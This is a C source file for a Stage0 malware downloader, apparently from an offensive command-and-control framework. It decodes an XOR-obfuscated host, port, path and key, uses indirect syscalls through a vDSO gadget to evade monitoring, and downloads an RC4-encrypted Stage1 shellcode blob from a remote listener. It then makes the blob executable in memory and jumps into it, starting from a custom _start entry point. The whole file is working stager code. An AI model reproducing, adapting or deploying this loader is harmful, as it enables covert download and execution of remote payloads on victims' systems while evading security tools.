#define _GNU_SOURCE
#include "packer.h"
#include "rc4.h"
#include "syscalls.h"
#include "transport.h"
#include "utils.h"

/* Configurable Options - from Makefile */
#ifndef ENCODED_HOST
#define ENCODED_HOST 0x00
#endif
#ifndef ENCODED_PORT
#define ENCODED_PORT 0x00
#endif
#ifndef ENCODED_PATH
#define ENCODED_PATH 0x00
#endif
#ifndef ENCODED_KEY
#define ENCODED_KEY 0x00
#endif
#ifndef CONFIG_XOR_KEY
#define CONFIG_XOR_KEY 0x5A
#endif
#ifndef MAX_STAGE_BLOB_SIZE
#define MAX_STAGE_BLOB_SIZE (40 * 1024 * 1024)
#endif

// XOR-encoded configuration arrays
static const unsigned char encoded_host[] = {ENCODED_HOST};
static const unsigned char encoded_port[] = {ENCODED_PORT};
static const unsigned char encoded_path[] = {ENCODED_PATH};
static const unsigned char encoded_key[] = {ENCODED_KEY};

static void downloader_main(void) {
  /* Resolve vDSO syscall gadget before any other syscalls */
  init_indirect_syscalls();

  char host[256];
  char port[16];
  char path[256];
  char key_str[256];
  uint8_t key[DERIVED_KEY_LEN];

  decode_config_string(host, encoded_host, sizeof(host));
  decode_config_string(port, encoded_port, sizeof(port));
  decode_config_string(path, encoded_path, sizeof(path));
  decode_config_string(key_str, encoded_key, sizeof(key_str));
  derive_key_from_string(key_str, key);

  debug_print("Stage0: Downloading Stage1 blob from %s:%s%s via %s\n", host,
              port, path, transport_name());

  void *stage_blob = (void *)mmap(NULL, MAX_STAGE_BLOB_SIZE,
                                  PROT_READ | PROT_WRITE,
                                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (stage_blob == MAP_FAILED) {
    debug_print("Stage0: mmap failed\n");
    exit(1);
  }

  size_t downloaded_size = transport_download(host, port, path, stage_blob,
                                              MAX_STAGE_BLOB_SIZE, key);

  if (downloaded_size == 0) {
    debug_print("Stage0: download failed\n");
    munmap(stage_blob, MAX_STAGE_BLOB_SIZE);
    exit(1);
  }

  // Decrypt the full staged blob (reflective shared objective shellcode
  // generated by malasada) using the RC4 stream cipher. The listener encrypts
  // it with the same derived key (see buildServedBlob in core/lib/listener).
  rc4_ctx rc4;
  rc4_init(&rc4, key, DERIVED_KEY_LEN);
  rc4_crypt(&rc4, (uint8_t *)stage_blob, downloaded_size);

  if (mprotect(stage_blob, MAX_STAGE_BLOB_SIZE, PROT_READ | PROT_EXEC) != 0) {
    debug_print("Stage0: mprotect failed\n");
    munmap(stage_blob, MAX_STAGE_BLOB_SIZE);
    exit(1);
  }

  debug_print("Stage0: downloaded %d bytes, jumping to Stage1\n",
              (int)downloaded_size);

  typedef void (*stage1_entry)(void *base_addr, size_t total_size);
  stage1_entry entry = (stage1_entry)stage_blob;
  entry(stage_blob, downloaded_size);

  exit(0);
}

__attribute__((visibility("default"))) int main(void) {
  downloader_main();
  return 0;
}

// Start routine similar to main.c but calls downloader_main
__asm__(".section .init,\"ax\",@progbits\n"
        ".global _start\n"
        "_start:\n"
        "xor %rbp, %rbp\n"
        "and $0xfffffffffffffff0, %rsp\n"
        "call downloader_main\n"
        "mov $60, %rax\n"
        "xor %rdi, %rdi\n"
        "syscall\n");
